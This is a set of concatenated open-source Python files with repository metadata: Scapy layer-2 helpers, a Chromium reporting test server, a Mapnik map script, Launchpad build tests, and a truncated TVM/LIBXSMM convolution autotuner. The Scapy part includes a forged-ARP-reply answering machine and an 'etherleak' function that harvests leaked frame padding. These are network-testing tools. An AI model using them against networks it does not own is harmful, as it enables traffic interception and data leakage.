conf.netcache.arp_cache[pair[1].psrc] = (pair[1].hwsrc, time.time())
if verbose:
ans.show()
return ans,unans
@conf.commands.register
def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00",**kargs):
"""Try to guess if target is in Promisc mode. The target is provided by its ip."""
responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip),type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0,**kargs)
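    # Idea behind this check (descriptive note): the who-has request was addressed
    # to a unicast-looking, non-broadcast MAC, so a host whose NIC is not in
    # promiscuous mode should drop the frame; a reply therefore suggests the NIC is
    # passing all frames up the stack.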
return responses is not None
@conf.commands.register
def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
"""Send ARP who-has requests to determine which hosts are in promiscuous mode
promiscping(net, iface=conf.iface)"""
ans,unans = srp(Ether(dst=fake_bcast)/ARP(pdst=net),
filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs)
ans = ARPingResult(ans.res, name="PROMISCPing")
ans.display()
return ans,unans
class ARP_am(AnsweringMachine):
function_name="farpd"
filter = "arp"
send_function = staticmethod(sendp)
def parse_options(self, IP_addr=None, iface=None, ARP_addr=None):
self.IP_addr=IP_addr
self.iface=iface
self.ARP_addr=ARP_addr
def is_request(self, req):
return (req.haslayer(ARP) and
req.getlayer(ARP).op == 1 and
(self.IP_addr == None or self.IP_addr == req.getlayer(ARP).pdst))
def make_reply(self, req):
ether = req.getlayer(Ether)
arp = req.getlayer(ARP)
iff,a,gw = conf.route.route(arp.psrc)
        if self.iface != None:
            iff = self.iface  # use the configured interface (the bare name `iface` is undefined here)
ARP_addr = self.ARP_addr
IP_addr = arp.pdst
resp = Ether(dst=ether.src,
src=ARP_addr)/ARP(op="is-at",
hwsrc=ARP_addr,
psrc=IP_addr,
hwdst=arp.hwsrc,
pdst=arp.pdst)
return resp
def sniff(self):
sniff(iface=self.iface, **self.optsniff)
@conf.commands.register
def etherleak(target, **kargs):
"""Exploit Etherleak flaw"""
return srpflood(Ether()/ARP(pdst=target),
prn=lambda a: conf.padding_layer in a[1] and hexstr(a[1][conf.padding_layer].load),
filter="arp", **kargs)
|
kisel/trex-core
|
scripts/external_libs/scapy-2.3.1/python3/scapy/layers/l2.py
|
Python
|
apache-2.0
| 17,955
| 0.017154
|
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from googleapiclient.discovery import build
from google.oauth2 import service_account
class RealTimeReportingServer():
SCOPES = ['https://www.googleapis.com/auth/admin.reports.audit.readonly']
USER_EMAIL = 'admin@beyondcorp.bigr.name'
def create_reports_service(self, user_email):
"""Build and returns an Admin SDK Reports service object authorized with
the service accounts that act on behalf of the given user.
Args:
user_email: The email of the user. Needs permissions to access
the Admin APIs.
Returns:
Admin SDK reports service object.
"""
localDir = os.path.dirname(os.path.abspath(__file__))
filePath = os.path.join(localDir, 'service_accountkey.json')
credentials = service_account.Credentials.from_service_account_file(
filePath, scopes=self.SCOPES)
delegatedCreds = credentials.create_delegated(user_email)
return build('admin', 'reports_v1', credentials=delegatedCreds)
def lookupevents(self, eventName, startTime, deviceId):
containsEvent = False
reportService = self.create_reports_service(self.USER_EMAIL)
results = reportService.activities().list(
userKey='all',
applicationName='chrome',
customerId='C029rpj4z',
eventName=eventName,
startTime=startTime).execute()
activities = results.get('items', [])
for activity in activities:
for event in activity.get('events', []):
for parameter in event.get('parameters', []):
if parameter['name'] == 'DEVICE_ID' and \
parameter['value'] in deviceId:
containsEvent = True
break
return containsEvent
|
chromium/chromium
|
chrome/test/enterprise/e2e/connector/realtime_reporting_bce/reporting_server.py
|
Python
|
bsd-3-clause
| 1,846
| 0.003792
|
import logging
import mapnik
import xml.etree.ElementTree as ET
import os
import subprocess
import tempfile
# Set up logging
logging.basicConfig(format="%(asctime)s|%(levelname)s|%(message)s", level=logging.INFO)
# Parameters
shpPath = "C:/Projects/BirthsAndPregnanciesMapping/data/2014-04-24/Zanzibar/Zanzibar.shp"
epsDir = "C:/Projects/BirthsAndPregnanciesMapping/results/eps"
max_img_size = 1000 # Max width or height of output image
# Create style
stroke = mapnik.Stroke()
stroke.color = mapnik.Color(0,0,0)
stroke.width = 1.0
symbolizer = mapnik.LineSymbolizer(stroke)
rule = mapnik.Rule()
rule.symbols.append(symbolizer)
style = mapnik.Style()
style.rules.append(rule)
# Create Datasource
datasource = mapnik.Shapefile(file=shpPath)
# Create layer
layer = mapnik.Layer("boundaries")
layer.datasource = datasource
layer.styles.append("boundariesStyle")
# Calculate image output size
envelope = datasource.envelope()
dLong = envelope.maxx - envelope.minx
dLat = envelope.maxy - envelope.miny
aspectRatio = dLong / dLat
if dLong > dLat:
width = max_img_size
height = int(width / aspectRatio)
elif dLat > dLong:
height = max_img_size
width = int(aspectRatio * height)
else:
width = max_img_size
height = max_img_size
# Create map
map = mapnik.Map(width, height)
map.append_style("boundariesStyle", style)
map.layers.append(layer)
map.zoom_all()
# Output to temporary postscript file
outPsPath = os.path.join(tempfile.gettempdir(), "ZanzibarAdminBoundaries.ps")
mapnik.render_to_file(map, outPsPath)
# Convert postscript to EPS file using ghostscript
outEpsPath = os.path.join(epsDir, "ZanzibarAdminBoundaries.eps")
subprocess.call(["C:/Program Files/gs/gs9.14/bin/gswin64c",
"-dDEVICEWIDTHPOINTS=%s" % width,
"-dDEVICEHEIGHTPOINTS=%s" % height,
"-sDEVICE=eps2write",
"-o",
outEpsPath,
outPsPath])
# Delete temporary file
os.remove(outPsPath)
|
hishivshah/WorldPop
|
code/create_zanzibar_boundary_map.py
|
Python
|
mit
| 1,981
| 0.002524
|
# Copyright 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Tests for the source package recipe view classes and templates."""
__metaclass__ = type
from mechanize import LinkNotFoundError
from storm.locals import Store
from testtools.matchers import StartsWith
import transaction
from zope.component import getUtility
from zope.security.interfaces import Unauthorized
from zope.security.proxy import removeSecurityProxy
from lp.buildmaster.enums import BuildStatus
from lp.registry.interfaces.person import IPersonSet
from lp.services.webapp import canonical_url
from lp.soyuz.interfaces.processor import IProcessorSet
from lp.testing import (
admin_logged_in,
ANONYMOUS,
BrowserTestCase,
login,
logout,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
from lp.testing.pages import (
extract_text,
find_main_content,
find_tags_by_class,
setupBrowser,
setupBrowserForUser,
)
from lp.testing.sampledata import ADMIN_EMAIL
class TestCanonicalUrlForRecipeBuild(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_canonical_url(self):
owner = self.factory.makePerson(name='ppa-owner')
ppa = self.factory.makeArchive(owner=owner, name='ppa')
build = self.factory.makeSourcePackageRecipeBuild(archive=ppa)
self.assertThat(
canonical_url(build),
StartsWith(
'http://launchpad.dev/~ppa-owner/+archive/ppa/+recipebuild/'))
class TestSourcePackageRecipeBuild(BrowserTestCase):
"""Create some sample data for recipe tests."""
layer = DatabaseFunctionalLayer
def setUp(self):
"""Provide useful defaults."""
super(TestSourcePackageRecipeBuild, self).setUp()
self.admin = getUtility(IPersonSet).getByEmail(ADMIN_EMAIL)
self.chef = self.factory.makePerson(
displayname='Master Chef', name='chef')
self.user = self.chef
self.ppa = self.factory.makeArchive(
displayname='Secret PPA', owner=self.chef, name='ppa')
self.squirrel = self.factory.makeDistroSeries(
displayname='Secret Squirrel', name='secret', version='100.04',
distribution=self.ppa.distribution)
naked_squirrel = removeSecurityProxy(self.squirrel)
naked_squirrel.nominatedarchindep = self.squirrel.newArch(
'i386', getUtility(IProcessorSet).getByName('386'), False,
self.chef, supports_virtualized=True)
def makeRecipeBuild(self):
"""Create and return a specific recipe."""
chocolate = self.factory.makeProduct(name='chocolate')
cake_branch = self.factory.makeProductBranch(
owner=self.chef, name='cake', product=chocolate)
recipe = self.factory.makeSourcePackageRecipe(
owner=self.chef, distroseries=self.squirrel, name=u'cake_recipe',
description=u'This recipe builds a foo for disto bar, with my'
' Secret Squirrel changes.', branches=[cake_branch],
daily_build_archive=self.ppa)
build = self.factory.makeSourcePackageRecipeBuild(
recipe=recipe)
return build
def test_cancel_build(self):
"""An admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Cancel build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Cancel build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
BuildStatus.SUPERSEDED,
build.status)
def test_cancel_build_not_admin(self):
"""No one but an admin can cancel a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+cancel', user=self.chef)
def test_cancel_build_wrong_state(self):
"""If the build isn't queued, you can't cancel it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Cancel build')
def test_rescore_build(self):
"""An admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = '1024'
browser.getControl('Rescore build').click()
self.assertEqual(
browser.url,
build_url)
login(ANONYMOUS)
self.assertEqual(
build.buildqueue_record.lastscore,
1024)
def test_rescore_build_invalid_score(self):
"""Build scores can only take numbers."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
browser.getLink('Rescore build').click()
self.assertEqual(
browser.getLink('Cancel').url,
build_url)
browser.getControl('Score').value = 'tentwentyfour'
browser.getControl('Rescore build').click()
self.assertEqual(
extract_text(find_tags_by_class(browser.contents, 'message')[1]),
'Invalid integer data')
def test_rescore_build_not_admin(self):
"""No one but admin can rescore a build."""
queue = self.factory.makeSourcePackageRecipeBuildJob()
build = queue.specific_job.build
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.chef)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
self.assertRaises(
Unauthorized,
self.getUserBrowser, build_url + '/+rescore', user=self.chef)
def test_rescore_build_wrong_state(self):
"""If the build isn't queued, you can't rescore it."""
build = self.makeRecipeBuild()
build.cancelBuild()
transaction.commit()
build_url = canonical_url(build)
logout()
browser = self.getUserBrowser(build_url, user=self.admin)
self.assertRaises(
LinkNotFoundError,
browser.getLink, 'Rescore build')
def test_rescore_build_wrong_state_stale_link(self):
"""Show sane error if you attempt to rescore a non-queued build.
This is the case where the user has a stale link that they click on.
"""
build = self.factory.makeSourcePackageRecipeBuild()
build.cancelBuild()
index_url = canonical_url(build)
browser = self.getViewBrowser(build, '+rescore', user=self.admin)
self.assertEqual(index_url, browser.url)
self.assertIn(
'Cannot rescore this build because it is not queued.',
browser.contents)
def test_rescore_build_wrong_state_stale_page(self):
"""Show sane error if you attempt to rescore a non-queued build.
This is the case where the user is on the rescore page and submits.
"""
build = self.factory.makeSourcePackageRecipeBuild()
index_url = canonical_url(build)
browser = self.getViewBrowser(build, '+rescore', user=self.admin)
with person_logged_in(self.admin):
build.cancelBuild()
browser.getLink('Rescore build').click()
self.assertEqual(index_url, browser.url)
self.assertIn(
'Cannot rescore this build because it is not queued.',
browser.contents)
def test_builder_history(self):
build = self.makeRecipeBuild()
Store.of(build).flush()
build_url = canonical_url(build)
build.updateStatus(
BuildStatus.FULLYBUILT, builder=self.factory.makeBuilder())
browser = self.getViewBrowser(build.builder, '+history')
self.assertTextMatchesExpressionIgnoreWhitespace(
'Build history.*~chef/chocolate/cake recipe build',
extract_text(find_main_content(browser.contents)))
self.assertEqual(build_url,
browser.getLink('~chef/chocolate/cake recipe build').url)
def makeBuildingRecipe(self, archive=None):
builder = self.factory.makeBuilder()
build = self.factory.makeSourcePackageRecipeBuild(archive=archive)
build.updateStatus(BuildStatus.BUILDING, builder=builder)
build.queueBuild()
build.buildqueue_record.builder = builder
build.buildqueue_record.logtail = 'i am failing'
return build
def makeNonRedirectingBrowser(self, url, user=None):
browser = setupBrowserForUser(user) if user else setupBrowser()
browser.mech_browser.set_handle_equiv(False)
browser.open(url)
return browser
def test_builder_index_public(self):
build = self.makeBuildingRecipe()
url = canonical_url(build.builder)
logout()
browser = self.makeNonRedirectingBrowser(url)
self.assertIn('i am failing', browser.contents)
def test_builder_index_private(self):
archive = self.factory.makeArchive(private=True)
with admin_logged_in():
build = self.makeBuildingRecipe(archive=archive)
url = canonical_url(removeSecurityProxy(build).builder)
random_person = self.factory.makePerson()
logout()
# An unrelated user can't see the logtail of a private build.
browser = self.makeNonRedirectingBrowser(url, random_person)
self.assertNotIn('i am failing', browser.contents)
# But someone who can see the archive can.
browser = self.makeNonRedirectingBrowser(url, archive.owner)
self.assertIn('i am failing', browser.contents)
|
abramhindle/UnnaturalCodeFork
|
python/testdata/launchpad/lib/lp/code/browser/tests/test_sourcepackagerecipebuild.py
|
Python
|
agpl-3.0
| 11,028
| 0.000091
|
#!/usr/bin/env python3
###############################################################################
# Copyright (c) Intel Corporation - All rights reserved. #
# This file is part of the LIBXSMM library. #
# #
# For information on the license, see the LICENSE file. #
# Further information: https://github.com/hfp/libxsmm/ #
# SPDX-License-Identifier: BSD-3-Clause #
###############################################################################
# Anand Venkat (Intel Corp.)
###############################################################################
import logging
import sys
import numpy as np
import tvm
import topi
import time
from topi.util import get_const_tuple
import math
import topi.testing
import xlwt
import argparse
import os
import ctypes
from tvm import autotvm
from tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner
parser = argparse.ArgumentParser()
parser.add_argument("-d", nargs=1, type=str, default=["resnet3"])
args = parser.parse_args()
layer = args.d[0]
#Resnet-50 layers (excluding first layer)
_resnet_layers ={
'resnet2':[1,256,64,56,56,1,1,0],
'resnet3':[1,64,64,56,56,1,1,0],
'resnet4':[1,64,64,56,56,3,1,1],
'resnet5':[1,64,256,56,56,1,1,0],
'resnet6':[1,512,256,56,56,1,2,0],
'resnet7':[1,128,256,56,56,1,2,0],
'resnet8':[1,128,128,28,28,3,1,1],
'resnet9':[1,512,128,28,28,1,1,0],
'resnet10':[1,128,512,28,28,1,1,0],
'resnet11':[1,1024,512,28,28,1,2,0],
'resnet12':[1,256,512,28,28,1,2,0],
'resnet13':[1,256,256,14,14,3,1,1],
'resnet14':[1,1024,256,14,14,1,1,0],
'resnet15':[1,256,1024,14,14,1,1,0],
'resnet16':[1,2048,1024,14,14,1,2,0],
'resnet17':[1,512,1024,14,14,1,2,0],
'resnet18':[1,512,512,7,7,3,1,1],
'resnet19':[1,2048,512,7,7,1,1,0],
'resnet20':[1,512,2048,7,7,1,1,0]
}
'''
Convert input from NCHW format to NCHW16C format where the innermost data dimension is vectorized for AVX-512
'''
def convert_input(a_np, batch, in_channel,input_height,input_width,pad_height,pad_width,vlen,A):
to_return = np.zeros((batch, math.ceil(in_channel/vlen),input_height + 2*pad_height, input_width+ 2*pad_width,vlen),dtype = A.dtype)
for i in range(batch):
for j in range(math.ceil(in_channel/vlen)):
for k in range(input_height + 2*pad_height):
for l in range(input_width + 2*pad_width):
for m in range(vlen):
if k < pad_height or k >= input_height + pad_height or l < pad_width or l >= input_width+ pad_width or j*vlen + m >= in_channel:
to_return[i,j,k,l,m] = float(0)
else:
to_return[i,j,k,l,m] = a_np[i,j*vlen + m,k-pad_height,l-pad_width]
return to_return
'''
Convert output from the blocked NCHW16C format back to NCHW, undoing the AVX-512 channel vectorization
'''
def convert_output(a_np, batch, out_channel,output_height,output_width,vlen):
to_return = np.zeros((batch, out_channel,output_height, output_width), dtype = float)
for i in range(batch):
for j in range(math.ceil(out_channel/vlen)):
for k in range(output_height):
for l in range(output_width):
for m in range(vlen):
to_return[i,j*vlen + m,k,l] = a_np[i,j,k,l,m]
return to_return
'''
Convert weights from KCRS format to KCRS16C16K format where the innermost data dimension is vectorized for AVX-512
'''
def convert_weight(w_np, in_channel, out_channel, kernel_height, kernel_width, vlen,W):
to_return = np.zeros((math.ceil(out_channel/vlen), math.ceil(in_channel/vlen),kernel_height, kernel_width,vlen,vlen), dtype = W.dtype)
for i in range(math.ceil(out_channel/vlen)):
for j in range(math.ceil(in_channel/vlen)):
for k in range(kernel_height):
for l in range(kernel_width):
for m in range(vlen):
for n in range(vlen):
if i*vlen + n >= out_channel or j*vlen + m >= in_channel:
to_return[i,j,k,l,m,n] =float(0)
else:
to_return[i,j,k,l,m,n] = w_np[i*vlen + n,j*vlen+ m,k,l]
return to_return
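# A minimal sanity-check sketch (not part of the original script; the tiny sizes below are
# illustrative assumptions). It shows that convert_weight pads both channel dimensions up to a
# multiple of vlen and permutes KCRS weights into the blocked layout used by the kernels:
#
#     w_small = np.random.uniform(size=(5, 3, 1, 1)).astype('float32')  # (K=5, C=3, R=1, S=1)
#     w_blocked = convert_weight(w_small, 3, 5, 1, 1, 16, w_small)      # w_small as W only supplies the dtype
#     assert w_blocked.shape == (1, 1, 1, 1, 16, 16)                    # ceil(5/16) x ceil(3/16) x R x S x 16 x 16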
# Get the reference output tensor for correctness check
def get_ref_data(batch,out_channel,in_channel,input_height,input_width,kernel_height,kernel_width,stride_height,padding):
a_np = np.random.uniform(size=(batch,in_channel,input_height,input_width)).astype(float)
w_np = np.random.uniform(size=(out_channel,in_channel,kernel_height,kernel_width)).astype(float)
if batch == 1:
b_np = topi.testing.conv2d_nchw_python(a_np, w_np, stride_height, padding)
#b_np = topi.nn.conv2d_NCHWc(a_np, w_np,out_channel,kernel_height,stride_height,
# padding, layout="NCHWc", out_layout="NCHWc", out_dtype='float32')
if batch == 1:
return a_np, w_np, b_np
else:
return a_np, w_np
# special case for small height and width (e.g. h = w = 7), where (h*w) becomes the brgemm dimension (M)
def intrin_libxsmm_hxw(ofmblock,ofw,ifmblock, stride_width,ifw,rco, ifh,r,s, ifh_stride, ifw_stride,\
ofh, stride_height, out_channel,output_height, output_width, in_channel):
last_input_width_index = (ofw-1)*stride_width + s-1
last_input_height_index = (ofh-1)*stride_height + r-1
ry = tvm.reduce_axis((0, r), name='ry')
rx = tvm.reduce_axis((0, s), name='rx')
A = tvm.placeholder((rco,r,s,ifmblock, ofmblock), name='w')
B = tvm.placeholder((rco,last_input_height_index + 1,last_input_width_index + 1,ifmblock), name='b')
k = tvm.reduce_axis((0, ifmblock), name='k')
k_outer = tvm.reduce_axis((0, rco), name='k_outer')
C = tvm.compute(
(ofh,ofw,ofmblock),
lambda z,m,n: tvm.sum(A[k_outer,ry,rx,k,n] * B[k_outer,ry + z*stride_height,rx + m*stride_width,k], axis=[k_outer,ry,rx,k]),
name='out')
s1 = tvm.create_schedule(C.op)
ifw1,ofw1,ofmblock1 = s1[C].op.axis
rco_outer,ry,rx,rci = s1[C].op.reduce_axis
s1[C].reorder(ifw1,rco_outer,ry,rx,ofw1,ofmblock1,rci)
xx_ptr = tvm.decl_buffer(A.shape, A.dtype,
name="W",offset_factor = 1,
data_alignment=64)
yy_ptr = tvm.decl_buffer(B.shape, B.dtype,
name="X",offset_factor=1,\
strides=[tvm.var("s3"),tvm.var("s2"), ifmblock, 1],#offset_factor=16
data_alignment=64)
zz_ptr = tvm.decl_buffer(C.shape, C.dtype,
name="OUT",offset_factor=1,#offset_factor=1,
strides=[output_width*ofmblock, ofmblock, 1],
data_alignment=64)
def intrin_func(ins, outs):
      # tvm call extern is used to interface to the libxsmm batch reduce kernel gemm implementation
# rco*r*s is the number of batches
init_and_compute = tvm.call_extern ("int32","batch_reduce_kernel_init_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"),\
rco*r*s,ofmblock,ifmblock,r,s,ifh_stride,ifw_stride, ofw*ofh, stride_width)
reset = tvm.call_extern ("int32","batch_reduce_kernel_init", outs[0].access_ptr("w"),ofmblock, ofw*ofh)
body = tvm.call_extern ("int32","batch_reduce_kernel_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"), rco*r*s,ofmblock,\
ifmblock,ofw*ofh, stride_width,r,s, ifh_stride,ifw_stride)
if math.ceil(in_channel/ifmblock) == rco:
return init_and_compute, None, init_and_compute
else:
return init_and_compute,reset,body
with tvm.build_config(data_alignment=64):
return tvm.decl_tensor_intrin(C.op, intrin_func, name="GEMM",
binds= {A: xx_ptr,
B: yy_ptr,
C: zz_ptr})
# regular case of batch reduce gemm with ofw corresponding to batch reduce brgemm dimension(M)
def intrin_libxsmm_tuned(ofmblock,ofw,ifmblock, stride_width,ifw,rco, ifh,r,s, ifh_stride, ifw_stride, in_channel):
last_input_width_index = (ofw-1)*stride_width + s-1
A = tvm.placeholder((rco,r,s,ifmblock, ofmblock), name='w')
B = tvm.placeholder((rco,r,last_input_width_index + 1,ifmblock), name='b')
k = tvm.reduce_axis((0, ifmblock), name='k')
k_outer = tvm.reduce_axis((0, rco), name='k_outer')
ry = tvm.reduce_axis((0, r), name='ry')
rx = tvm.reduce_axis((0, s), name='rx')
C = tvm.compute(
(ofw,ofmblock),
lambda m,n: tvm.sum(A[k_outer,ry,rx,k,n] * B[k_outer,ry, rx + m*stride_width,k], axis=[k_outer,ry,rx,k]),
name='out')
s1 = tvm.create_schedule(C.op)
w,ofm = s1[C].op.axis
kco,ky,kx,kci = s1[C].op.reduce_axis
s1[C].reorder(kco,ky,kx,w,ofm,kci)
xx_ptr = tvm.decl_buffer(A.shape, A.dtype,
name="W",offset_factor=1,
data_alignment=64)
yy_ptr = tvm.decl_buffer(B.shape, B.dtype,
name="some", offset_factor=1,strides=[tvm.var("s3"), tvm.var("s2"), ifmblock, 1],
data_alignment=64)
zz_ptr = tvm.decl_buffer(C.shape, C.dtype,
name="OUT",offset_factor=1,
data_alignment=64)
def intrin_func(ins, outs):
# tvm call extern is used to interface to libxsmm batch reduce kernel gemm implementation
# rco*r*s is the number of batches
init_and_compute = tvm.call_extern ("int32","batch_reduce_kernel_init_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"),\
rco*r*s,ofmblock,ifmblock,r,s,ifh_stride,ifw_stride, ofw, stride_width)
reset = tvm.call_extern ("int32","batch_reduce_kernel_init", outs[0].access_ptr("w"),ofmblock, ofw)
body = tvm.call_extern ("int32","batch_reduce_kernel_update", ins[0].access_ptr("r"),ins[1].access_ptr("r"),outs[0].access_ptr("w"), rco*r*s,ofmblock,\
ifmblock,ofw, stride_width,r,s, ifh_stride,ifw_stride)
if math.ceil(in_channel/ifmblock) == rco:
return init_and_compute, None, init_and_compute
else:
return init_and_compute,reset,body
with tvm.build_config(data_alignment=64):
return tvm.decl_tensor_intrin(C.op, intrin_func, name="GEMM",
binds={A: xx_ptr,
B: yy_ptr,
C: zz_ptr})
# AutoTVM template for the libxsmm brgemm-based tensorize implementation
@autotvm.template
def conv_auto_tuned(ofmblock,ofw, ifmblock, stride_width,input_width,\
in_channel,input_height, filter_height, filter_width,ofh, stride_height, batch, out_channel):
A1 = tvm.placeholder((batch,math.ceil(in_channel/ifmblock),input_height, input_width, ifmblock), name='input')
W1 = tvm.placeholder((math.ceil(out_channel/ofmblock), math.ceil(in_channel/ifmblock), filter_height, filter_width, ifmblock,ofmblock), name='weight')
rco1 = tvm.reduce_axis((0, math.ceil(in_channel/ifmblock)), name='rco1')
ry1 = tvm.reduce_axis((0, filter_height), name='ry1')
rx1 = tvm.reduce_axis((0, filter_width), name='rx1')
rci1 = tvm.reduce_axis((0, ifmblock), name='rci1')
cfg = autotvm.get_config()
cfg.define_knob("pack", [0,1])
pack = False
w_tile = []
factor_found = False
for i in range(6, min(ofw+1,29)):
if ofw % i == 0:
w_tile.append((i, ofw//i) )
factor_found = True
if factor_found == False:
w_tile.append((ofw,1))
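    # Illustrative example (assuming ofw = 56): the loop above yields w_tile = [(7, 8), (8, 7), (14, 4), (28, 2)]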
#tile factors for output width
cfg.define_knob("tile_w", w_tile)
# pack data when stride > 1 and pack flag set so that data for brgemm is continuous
if filter_height == 1 and filter_width == 1 and stride_width > 1 and stride_height > 1 and cfg['pack'].val == 1 :
A2 = tvm.compute((batch, math.ceil(in_channel/ifmblock),ofh,ofw,ifmblock),
lambda n,c,h,w,vlen1: A1[n, c,h*stride_height,w*stride_width,vlen1])
B1 = tvm.compute((batch, math.ceil(out_channel/ofmblock),ofh, ofw,ofmblock),
lambda nn,ff,yy, xx, vlen1: tvm.sum(
W1[ff,rco1,ry1,rx1,rci1,vlen1] * A2[nn, rco1, ry1 + yy, rx1 + xx,rci1],
axis=[rco1,ry1, rx1, rci1]),name='output')
pack = True
else:
# Compute the convolution
B1 = tvm.compute((batch, math.ceil(out_channel/ofmblock),ofh, ofw,ofmblock),
lambda nn,ff,yy, xx, vlen1: tvm.sum(
W1[ff,rco1,ry1,rx1,rci1,vlen1] * A1[nn, rco1, ry1 + stride_height*yy, rx1 + stride_width*xx,rci1],
axis=[rco1,ry1, rx1, rci1]), name='output')
s = tvm.create_schedule(B1.op)
n,ko,h,w,ki = s[B1].op.axis
rco,ry,rx, rci = s[B1].op.reduce_axis
cfg.define_split("tile_h", h, num_outputs=3)#output height
cfg.define_split("tile_c", rco, num_outputs=2) #input channel dimension
cfg.define_split("tile_k",ko, num_outputs=2) #output channel dimension
w_factor_inner, _ = cfg["tile_w"].val
wo, wi = s[B1].split(w, w_factor_inner) #tiling
rco_o,rco_i = cfg["tile_c"].apply(s, B1, rco)
ko_o, ko_i = cfg["tile_k"].apply(s, B1, ko)
ho,hm, hi = cfg["tile_h"].apply(s, B1, h)
s[B1].reorder(n,ko_o,ho,ko_i,rco_o,hm,wo,hi,rco_i,ry,rx,wi,ki,rci)
cfg.define_reorder("reorder_outer", [ko_i,rco_o,hm,wo], policy="all")
cfg.add_flop(np.prod(get_const_tuple(B1.shape))*in_channel*filter_height*filter_width*2)
cfg["reorder_outer"].apply(s, B1,[ko_i,rco_o,hm,wo])
if (filter_height == 1 and filter_width == 1 and stride_width == 1 and stride_height == 1) or pack:
if cfg["tile_h"].size[1] > 1 and w_factor_inner == ofw:#cfg["tile_w"].size[2] == ofw:
libxsmm_tensorize = intrin_libxsmm_hxw(ofmblock,w_factor_inner,ifmblock, 1, w_factor_inner,
cfg["tile_c"].size[1],cfg["tile_h"].size[2],\
filter_height, filter_width,ofh,ofw,cfg["tile_h"].size[2],1, out_channel, ofh,ofw, in_channel)
s[B1].tensorize(hi, libxsmm_tensorize)
else:
libxsmm_tensorize = intrin_libxsmm_tuned(ofmblock,w_factor_inner,ifmblock, 1, w_factor_inner,
cfg["tile_c"].size[1], cfg["tile_h"].size[2],\
filter_height, filter_width,ofh, ofw, in_channel)
s[B1].tensorize(rco_i, libxsmm_tensorize)
else:
libxsmm_tensorize = intrin_libxsmm_tuned(ofmblock,w_factor_inner,ifmblock, stride_width, w_factor_inner,\
cfg["tile_c"].size[1], cfg["tile_h"].size[2],\
filter_height, filter_width,input_height,input_width, in_channel)
s[B1].tensorize(rco_i, libxsmm_tensorize)
par = s[B1].fuse(n,ko_o,ho)
s[B1].parallel(par)
if pack:
n1,c1,h1,w1,v1 = s[A2].op.axis
par2 = s[A2].fuse(n1,c1,h1)
      s[A2].parallel(par2)
s[A2].vectorize(v1)
s = s.normalize()
return s, [W1, A1, B1]
def driver():
book = xlwt.Workbook(encoding="utf-8")
sheet1 = book.add_sheet("Sheet 1")
row1=0
sheet1.write(0,0,"Layer")
sheet1.write(0,1,"AutoTVM_FLOPS")
row1 = row1 + 1
batch = _resnet_layers[layer][0]
in_channel = _resnet_layers[layer][2]
out_channel = _resnet_layers[layer][1]
input_height = _resnet_layers[layer][3]
input_width = _resnet_layers[layer][4]
kernel_height = _resnet_layers[layer][5]
kernel_width = _resnet_layers[layer][5]
pad_height = _resnet_layers[layer][7]
pad_width = _resnet_layers[layer][7]
stride_height = _resnet_layers[layer][6]
stride_width = _resnet_layers[layer][6]
vlen = 64
assert(pad_height == pad_width)
assert(stride_height == stride_width)
assert(kernel_height == kernel_width)
output_width = ((input_width + 2 * pad_width - kernel_width) // stride_width) + 1
output_height = ((input_height + 2 * pad_height - kernel_height) // stride_height) + 1
assert(output_height == output_width)
assert(input_height == input_width)
ctx = tvm.context('llvm', 0)
sheet1.write(row1,0,layer)
if not ctx.exist:
        print("Skip because llvm is not enabled")
return
task = autotvm.task.create(conv_auto_tuned, args=(vlen,output_width, vlen, stride_width,input_width + 2*pad_width, in_channel,\
input_height + 2*pad_height, kernel_height, kernel_width,output_height, stride_height, batch, out_channel),\
target='llvm -mtriple=x86_64 -mcpu=skylake-avx512 -mattr=+skx,+fma,+fma4,+avx512ifma,+avx512f,+avx512cd,+avx512bw,+avx512vl,+avx512dq')
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
measure_option = autotvm.measure_option(builder=autotvm.LocalBuilder(), runner=autotvm.LocalRunner(number=1000, repeat=1,min_repeat_ms=1000))
tuner = autotvm.tuner.RandomTuner(task)
#Please limit n_trial to reduce tuning time
n_trial= len(task.config_space)
log_file = layer + ".log"
#comment out the following call to tuner to just run the best case from log file history
